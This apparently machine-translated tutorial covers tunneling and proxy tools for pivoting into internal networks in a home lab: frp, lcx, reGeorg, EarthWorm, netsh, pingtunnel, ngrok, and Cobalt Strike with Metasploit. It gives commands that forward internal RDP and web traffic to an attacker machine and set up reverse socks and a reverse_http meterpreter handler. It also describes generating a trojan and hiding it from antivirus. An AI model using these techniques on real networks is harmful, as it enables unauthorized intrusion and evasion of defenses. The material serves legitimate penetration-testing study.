Intranet Penetration - Tunnel Proxy Forwarding

preamble

This article introduces some tunneling proxy forwarding tools that I commonly use in intranet penetration.

Environment Setup

Environment Configuration Pitfalls: Remember to remove this √ from the intranet NIC, otherwise directly different network segments can also directly access the intranet...

win10_hacker: 192.168.29.139
kali_hacker: 192.168.29.128
windows (target server): (192.168.29.130, 10.0.0.3)
winserver2003: 10.0.0.112

Note: Dual network card system is not fixed with which, I use windows here, because I looked for a number of target machine finally on hand only win10 can run, here you can also use linux as a controlled machine, there is no so-called, pay attention to frp to use the corresponding system version can be.

List of tools

Forwardable tools, these are tools that do intranet traffic forwarding out of the network

Frp
Lcx
reGeorg
ew(EarthWorm)
netsh
pingtunnel
ngrok
cs

Proxy tools, these are local tools for traffic conversion

Proxifier(windows)
SocksCap(windows)
cs(windows)
Proxychains(linux)#not introduced in this article

Tool Use

Note: The following tools are only a brief description of how to use them.

Frp

Project Address:/fatedier/frp/

Server: kali_hacker (192.168.29.128)
Client: windows (target server): (192.168.29.130, 10.0.0.3)

Forward traffic from 10.0.0.112:80 on the client's intranet to port 6000 on the server.

command execution

kali_hacker

vim #Modify the port number yourself, don't conflict with the local port number.
# Run the command
. /frps -c

windows

# Configuration file description
serverAddr: server address.
serverPort: the port to which the server binds in the configuration file.
localIP: directly specify the ip in the intranet that you want to transfer.
localPort: which port number of the localIP will be forwarded out of the traffic
remotePort: which port number of the server to transfer the traffic into
type: indicates what type of traffic you want to forward, generally tcp and http (http will be introduced later)
customDomains: indicates that when the intranet information is transferred to what domain name you want to access, here you need to modify the hosts file, the ip and domain name binding.
# Run the command
. \ -c

Here is the common configuration, configured http, tcp (rdp, ssh)

serverAddr = "192.168.29.128"
serverPort = 7000

[[proxies]]
name = "web"
type = "http"
localIP = "10.0.0.112"
localPort = 80
customDomains = [""]

[[proxies]]
name = "rdp"
type = "tcp"
localIP = "10.0.0.112"
localPort = 3389
remotePort = 6000

[[proxies]]
name = "ssh"
type = "tcp"
localIP = "10.0.0.112"
localPort = 22
remotePort = 6000

test

server-side operation
Modify the hosts file: corresponding to the domain name and ip set by the client
(ip is this kali machine so you can write 127.0.0.1)

Client Running

Server access to the intranet

Ditto for port 6000, which is the 3389 traffic coming in from the intranet machine 10.0.0.112

Lcx

Project Address:
/Brucetg/Pentest-tools/tree/master/%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91

windows_hacker: (192.168.29.139)
windows_hacker: (192.168.29.139)

Divert 10.0.0.112:3389 traffic from the windows intranet to port 2222 on windows_hacker, then windows_hacker locally diverts port 2222 to port 4444.

command execution

windows_hacker

.\ -listen 2222 4444

windows

.\ -slave 192.168.29.139 2222 10.0.0.112 3389

test

windows_hacker running

The controlled windows host is running

windows_hacker remote desktop intranet machine

reGeorg

Project Address:
/sensepost/reGeorg

windows_hacker:(192.168.29.139)
windows (target server): (192.168.29.130, 10.0.0.3)

Use the script to help you tunnel the intranet information on the target machine's windows to port 9999 of windows_hacker through socks.

command execution

windows

Transfer the script of the corresponding site development language to the target server, you can access it successfully.
(If you are a php developer, then pass the php script, i.e.:)

windows_hacker

Requires python2
python2 -p 9999 -u http://192.168.29.130/

test

After uploading the file to the target server, it is sufficient to be able to access it successfully on the hacker machine

Running scripts using the python2 environment

Proxifier

Now it's already successfully turned out, just need to do a conversion of the turned out socks traffic, converted to locally available, because we know that the intranet has a website that needs to be converted to http traffic for access.
Using Proxifier to perform a local traffic conversion
1. Add a proxy server

2. Add proxy rules



Select your previously configured proxy server127.0.0.1:9999

Then take out your browser to visit the intranet ip can be, so that is equivalent to the intranet traffic completely to your machine above, rather than that a separate port to turn out, here as you wish to shop the intranet, bp packet grabbing are not a problem.
4. Successful access

ew(EarthWorm)

Project address: This tool has been taken down, sadly, so let's miss this tool next.
(This tool is basically impenetrable to antivirus. The rules are public.)

windows_hacker:(192.168.29.139)
windows_hacker:(192.168.29.139)

forward-looking agent

command execution

windows_hacker: Forward ip:port connection with proxifier
windows: -s ssocksd -l 1080

test

Target server windows
Note that 1080 is the port to which the transfer is made, and which will be used for later forward connections

windows_hacker: Configure the target ip+port and you're ready to access, this tool is very fast!

reverse proxy

command execution

Windows (target server): -s rssocks -d 192.168.29.139 -e 888

windows_hacker: -s rcsocks -l 1080 -e 888

It means that the target server's intranet environment is forwarded out to hacker's 888 through port 888, and then hacker transfers 888 to port 1080

test

The hacker machine listens first, otherwise there will be an error on the target server's side because the traffic can't be diverted.

Then the target server executes \

You'll see a response from the hacker side that says it worked.

SocksCap

We've used a lot of proxifiers above, so let's use SocksCap here.
1. Click Proxy, right click to add new proxy


2. The way to import the program, they choose a program to accept traffic, we are here to access the intranet web services on the choice of browser access.

3. After importing, you will be able to open access to the intranet site

netsh

It is recommended to do local port forwarding interface on the target server, personally I think local port forwarding works best.

command execution

Target server: 10.0.0.112:80 from the intranet to the local 880, preferably with the machine's external ip address.

netsh interface portproxy add v4tov4 listenaddress=192.168.29.130 listenport=880 connectaddress=10.0.0.112 connectport=80

pingtunnel

Here, because the experiment of windows as a destination routing server to forward intranet traffic failed, linux was used instead.
(Any successful masters can message me to see what's wrong and learn~)

command execution

Here try to forward the intranet traffic out of port 3389 can be, other ports are similar, here, whether it is the server or client, in which the system is running the same parameters, except that I'm here to run the server on windows can not receive the client to send a request, dependencies are also installed for specific reasons did not find, or failure, so only to use linux to do the server side.
(If any of the masters have succeeded, you can leave a message to let me know~)
server

./pingtunnel -type server

client

socks type: -type client -l :4455 -s -sock5 1
tcp type: -type client -l :4455 -s -t :4455 -tcp 1
udp type: -type client -l :4455 -s -t :4455

The format of the client command is explained here:

• -type: means that it is the client type that runs the
• -l
  If you omit the client's ip in front of it, it means the local ip, which means the local loopback address, and then: followed by the port number, you need to use 127.0.0.1 to connect, and if you specify the client's ip, you need to use the local ip to connect.
  (Here should also be able to forward to other ip for further utilization, here did not try, there are masters try successfully can comment section message to teach me.)
• -s
  in the name ofserver-sidedomain name or ip
• -t
  in the name ofThe ip of a machine on the server's intranet and the port number of the traffic to be forwarded out.

test

Experiment here to turn tcp traffic out, if you want to turn socks, remember to cooperate with other tools for conversion, such as linux with proxychains, windows with proxifier or other tools, etc., case-by-case analysis.
server-side

client (computing)

Successfully transferring 3389 traffic from server2003 on the intranet

ngrok

This ngrok is a solution to the LAN traffic can not be accessed like the public network, but the intranet machine needs to be able to get out of the network itself to be able to, equivalent to your home inside the LAN traffic is not everyone can access to, if you build a machine but want to let other areas can also be accessed without having to buy the public network ip, in this case ngrok is a good choice.
It is also used in intranet penetration as a means of solving problems such as the inability of intranet machine traffic to have direct access.

Here is a random machine, which needs to be able to access the extranet, but the extranet can not directly access him
windows: 192.168.29.130

Command Execution && Experimentation

1. First go to the official website and register an account:
/
2. After logging in, then enter and download the corresponding system version of ngrok to the target machine
3. Run the ngrok program as follows

Running Pictures

I'm mapping out port 80 here

Run this command if you don't see the green build successfully:ngrok http 80. Because it may not be the first time you get it, you need this command, after success you will see the mapped URL as shown below, just visit this directly.

After visiting the URL it may look like the following picture

You click visit and then see the site you mapped out, or you mapped other traffic to use other ways to link directly to this address can be.
Below you can see that I have successfully accessed the site set up in the intranet

ps: I tried to map the traffic out of port 3389 as a remote link, found that the failure of the specific reasons did not find, but after testing found that it seems that only the http site mapped out the best results, so I hope to map other traffic, or to find other tools to achieve the best.

cs

Here is very simple, is to throw the * horse to the target server will shell turn over can be, for intranet penetration is best or in the cs on-line will be transferred to the authority of the msf after the penetration of the operation of the best results.

command execution

Note in advance: the server to choose linux, the client to choose windows, you can also choose their own different collocation, the server and the client are provided with two choices, I personally more commonly used this collocation.
server-side

Installation of jdk, it is recommended to install jdk8 (installation method by Baidu)

. /teamserver server ip connection password

client (computing)

Installation of jdk, it is recommended to install jdk8 (installation method by Baidu)
. /

ps: teamserver is also available for windows, as is cs.

test

server-side

client (computing)
Windows just double-click the file

---

1. Then the client side generates a * horse
First create the listener

If you don't need any other proxies, you can just configure them as follows (for more usage, go to Baidu)

Choose to generate a * horse backdoor


Just save the * in a no-kill directory and don't let the antivirus kill it.
2. Wooden horse transmission on the target server can be executed, here to do experiments directly on the virtual machine to double-click the

Going back to the client to look at the cs reveals that a host is online, and you can even see his two NICs, internal and external ip

3. here is the best and msf linkage for intranet penetration effect is the best, so here I choose to let cs increase a session to msf in the
first runmsfconsoleOpen msf and create listener

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost (msfmonitoringip)192.168.29.128
set lport (msfmonitoring端口)4444

4. Then add the listener


5. Right click to add session

Then just select the msf listener you just added.
msf has got the shell, the follow up is to see if you play msf skillfully or not and it's done.

---

This article introduces the intranet to build some of the tools of the tunnel proxy, get the intranet environment can be carried out after the infiltration work
(subject to cybersecurity laws and under authorization, of course)